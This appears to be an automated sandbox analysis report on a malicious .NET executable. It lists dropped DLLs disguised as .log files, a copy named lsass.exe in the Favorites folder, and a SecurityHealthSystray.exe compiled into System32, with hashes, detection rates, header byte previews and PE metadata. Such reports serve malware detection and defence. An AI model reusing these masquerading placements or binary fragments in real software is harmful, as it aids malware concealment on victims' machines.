                                                                                    Category:dropped
                                                                                    Size (bytes):69632
                                                                                    Entropy (8bit):5.932541123129161
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                    C:\Users\user\Desktop\OljzCgRG.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\USZqVcJFLA.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85504
                                                                                    Entropy (8bit):5.8769270258874755
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                    C:\Users\user\Desktop\RzSYqgUu.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):69632
                                                                                    Entropy (8bit):5.932541123129161
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                    C:\Users\user\Desktop\bSdYXpxm.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\USZqVcJFLA.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32256
                                                                                    Entropy (8bit):5.631194486392901
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\oBKeyAWK.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\USZqVcJFLA.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.519109060441589
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\uhdUZoxx.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32256
                                                                                    Entropy (8bit):5.631194486392901
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\vnccfbfp.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85504
                                                                                    Entropy (8bit):5.8769270258874755
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                    C:\Users\user\Favorites\6203df4a6bafc7

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):119
                                                                                    Entropy (8bit):5.683565952489309
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:BU/vElDHfh0C2yq+UOdkBGuE067oqcydp1WKHnt:AvifhE0VdksAIs16t
                                                                                    MD5:8454F1A3BE7F91648FBD87DBF4AEF687
                                                                                    SHA1:1AD779017CC6B95BF5779915B7602BABBC4F5FFF
                                                                                    SHA-256:34E8E305A8EFAD664A0DE81D43B0FE7888FD6DECE2BA3AF1B66792E3988A7E74
                                                                                    SHA-512:345EFF068BEE161014E825860A5F3CFEE0D84CDE021573EC2136799EB9A586D414388EAD787C8704BEF478A3175F7619F1E65B044EDD6B3C84C22198C49C7279
                                                                                    Malicious:false
                                                                                    Preview:lEk3vb5oGbeDHdSjNQMvS7Ya2vvnlOsRCJFzqTM6Rde8KgJ698eAZkxopJA9qSC1tMB8Xc24EQezcaQWmynnur1bVbKhSMP9bmO7fLihFj6JF8LP3oW1oYH

                                                                                    C:\Users\user\Favorites\lsass.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                    Category:dropped
                                                                                    Size (bytes):1560958
                                                                                    Entropy (8bit):7.974265283144141
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:K17t7ROjwJqMAVS2hEijP79eAPkavlCCyYcBoZ11q8UuZPt5PsuWg:KBt7R0wJ4L5Uw5lCCyG31oIPmg
                                                                                    MD5:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    SHA1:B63D8E25D4EB9ABEA3ED0F7867F70DB2AB18CBA2
                                                                                    SHA-256:CB4626AD921C63113E18C3AEFB109F70C8E334089871133EA675D62D836D810B
                                                                                    SHA-512:FF51CCD8918344BB0439A4D9E39394383BFF2196496D778DB9A3D2862479E55F1BF59C7D467FF055C721231CB592C3C7DED63C5AF28A3F9552DC6421DD1151BF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                                    C:\Users\user\Favorites\lsass.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:false
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):1224
                                                                                    Entropy (8bit):4.435108676655666
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                    C:\Windows\System32\SecurityHealthSystray.exe

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4608
                                                                                    Entropy (8bit):3.9848906490496727
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:6hJXPt3uM7Jt8Bs3FJsdcV4MKe278qd2vqBHqOulajfqXSfbNtm:8PdPc+Vx9M8dvkUcjRzNt
                                                                                    MD5:0543CDD3BE612415A6D0082B0C2F06DE
                                                                                    SHA1:23CE6B41AD09ABC689EAB08F3D24D794C3035116
                                                                                    SHA-256:8DD6C11FCEE53625B1C811EA5546D579D982F76356146EDDC7B917ABD9E86858
                                                                                    SHA-512:B132D73B6CA4DF1E411ECC370D3AC1133C1D318F1AD8D7E8128538B4FDEB52F5FF7C67C9F0D7FF4868C02B98E5B3C8747CA26B384D9031FA2D5E027C9E54DD99
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Xg.............................'... ...@....@.. ....................................@..................................'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..X.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.(.......#GUID...8... ...#Blob...........WU........%3................................................................

                                                                                    \Device\Null

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\PING.EXE
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):502
                                                                                    Entropy (8bit):4.613865166769504
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:P+5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:wdUOAokItULVDv
                                                                                    MD5:0C62BCEEB58984C75AB308E22503AA70
                                                                                    SHA1:CF8D1698639026FAB48CA3F1EE801976E3FEEFA4
                                                                                    SHA-256:F7D1BFF19697A4FBA3F60CCFC17FD4A9FF9CDB93F8E3074D550DA1610FA6389D
                                                                                    SHA-512:931367FECA43800FA9A8B899CADCF6FCE02D9A331F5F38B1F4DBAB24272F04FA75C39DC5393D581EA05E096190F9BD451783E8865C6475A83FA4D247371E71DC
                                                                                    Malicious:false
                                                                                    Preview:..Pinging 051829 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                    Entropy (8bit):7.974265283144141
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:JNKHlxGvw4.exe
                                                                                    File size:1'560'958 bytes
                                                                                    MD5:6689bd9a5c795eedc631e5fbb850b7ff
                                                                                    SHA1:b63d8e25d4eb9abea3ed0f7867f70db2ab18cba2
                                                                                    SHA256:cb4626ad921c63113e18c3aefb109f70c8e334089871133ea675d62d836d810b
                                                                                    SHA512:ff51ccd8918344bb0439a4d9e39394383bff2196496d778db9a3d2862479e55f1bf59c7d467ff055c721231cb592c3c7ded63c5af28a3f9552dc6421dd1151bf
                                                                                    SSDEEP:24576:K17t7ROjwJqMAVS2hEijP79eAPkavlCCyYcBoZ11q8UuZPt5PsuWg:KBt7R0wJ4L5Uw5lCCyG31oIPmg
                                                                                    TLSH:DD7533E8CE1DC6F8FEFB4D3C222B92A25565C1497D516F6B8020514BEEFB04A1E77290
                                                                                    File Content Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`.............................

                                                                                    File Icon

                                                                                    Icon Hash:90cececece8e8eb0

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x402e5e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2e0c0x4f.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x320.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000xe640x10000baf8508519d41cdff0b3d392bf7f161False0.550048828125data5.290703402026259IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x40000x3200x400574e65dbca3f3dca430748b98fa97b40False0.3505859375data2.6411336922484443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x60000xc0x200e639c4c7bda1e10d4056215b438c51f7False1.001953125data6.527052376530866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0x40580x2c8data0.46207865168539325

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

